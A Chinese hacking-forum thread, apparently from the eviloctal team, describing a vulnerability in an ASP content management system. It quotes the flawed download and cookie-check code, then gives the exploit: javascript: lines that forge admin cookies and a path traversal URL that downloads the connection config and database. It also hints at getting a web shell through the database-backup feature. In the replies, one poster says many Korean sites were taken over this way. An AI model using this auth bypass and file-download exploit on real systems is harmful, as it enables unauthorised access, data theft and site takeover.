文章作者：武夫
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）



在/edit/downfile.asp中有如下代码:

复制内容到剪贴板

代码:

<!--#include file="fsoconfig.asp"-->
<!--#include file="checklogin.asp"-->
<%
call downloadFile(Request("path"))
function downloadFile(strFile)
  strFilename = server.MapPath(strFile)
  Response.Buffer = True
  Response.Clear
  Set s = Server.CreateObject("ADODB.Stream")
  s.Open
  s.Type = 1
  on error resume next
           Set fso = Server.CreateObject("Scripting.FileSystemObject")
  if not fso.FileExists(strFilename) then
    Response.Write("<h1>Error:</h1>" & strFilename & " does not exist<p>")
    Response.End
  end if
  Set f = fso.GetFile(strFilename)
  intFilelength = f.size
  s.LoadFromFile(strFilename)
  if err then
    Response.Write("<h1>Error: </h1>" & err.Description & "<p>")
    Response.End
  end if  
  Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
  Response.AddHeader "Content-Length", intFilelength
  Response.CharSet = "UTF-8"
  Response.ContentType = "application/octet-stream"  
  Response.BinaryWrite s.Read
  Response.Flush
  s.Close
  Set s = Nothing
End Function
%>

大意就是定义了一个downloadfile函数,用来下载文件.其中checklogin.asp是用来检查用户是否的登录的页面.查看他的源代码,有如下代码

复制内容到剪贴板

代码:

<%
[color=#FF0000]&#39;cookie验证[/color]
if Request.Cookies("admindj")<>"1" then
  Response.Write "<BR><BR><BR><BR><center>权限不足，你没有此功能的管理权限"
  Response.end
end if

if Request.Cookies("adminuser")="" or Request.Cookies("adminpass")="" then
  Response.Write "<BR><BR><BR><BR><center>权限不足，你没有此功能的管理权限."
  Response.end
end if
%>

cookies验证的是否登录,在浏览器中依次输入

复制内容到剪贴板

代码:

javascript:alert(document.cookie="admindj=1")
javascript:alert(document.cookie="adminuser=hackwolf")
javascript:alert(document.cookie="adminpass=fuckyou")

然后直接构造URL:

复制内容到剪贴板

代码:

http://localhost:81/edit/downfile.asp?path=../admin_conn.asp

顺利下载admin_conn.asp页面,happy
下载数据库,登录页面是:login.asp,登录
后台有备份数据库的功能,大家知道怎么做了吧

整站下载地址:http://down.asp300.com/ASP/170/843p.rar

数据库名加了＃ 用%23替换无法直接下载
用了 http://localhost:81/edit/downfile.asp?path=../数据库地址
显示下载对话框和文件体积，下载后是0字节，有什么的突破方法吗？

可以实现的~
默认的是14M左右吧~
我是使用辅臣的~
里面还有些参数没有过滤的，不过相对于楼主的这个漏洞那些就可以不用提了

不错.
我想起来久版的新云系统的downfile.asp?url=path

#db.asp我也没能下载下来，还有，如果管理员把后台地址改了的话就不好利用了

下不回来可能就是数据库做了防下载处理的..
最近搞韩国站
好多都是downfile搞定的..连上库..直接备份SHELL完事.

有的数据库下载下来了
还没权限打开。。。。

这个系统好像是利用讯时改的哦,

引用:

引用第5楼fhod于2007-11-19 10:25发表的 :
下不回来可能就是数据库做了防下载处理的..
最近搞韩国站
好多都是downfile搞定的..连上库..直接备份SHELL完事.

最近赚了多少？



难道你直接可以downfile搞定/？你怎么知道有没有那个漏洞？

有滴要密码哇.
- -# 如果再改了后台`利用也小了哦!

关于#%·#%.asa之类的 用一些专业的下载传输软件应该可以下载吧.

我很菜，我下载完admin_conn.asp页面页面后，找到数据库路径为什么下载不了啊？Directory Listing Denied（我是在本地自己架设的IIS）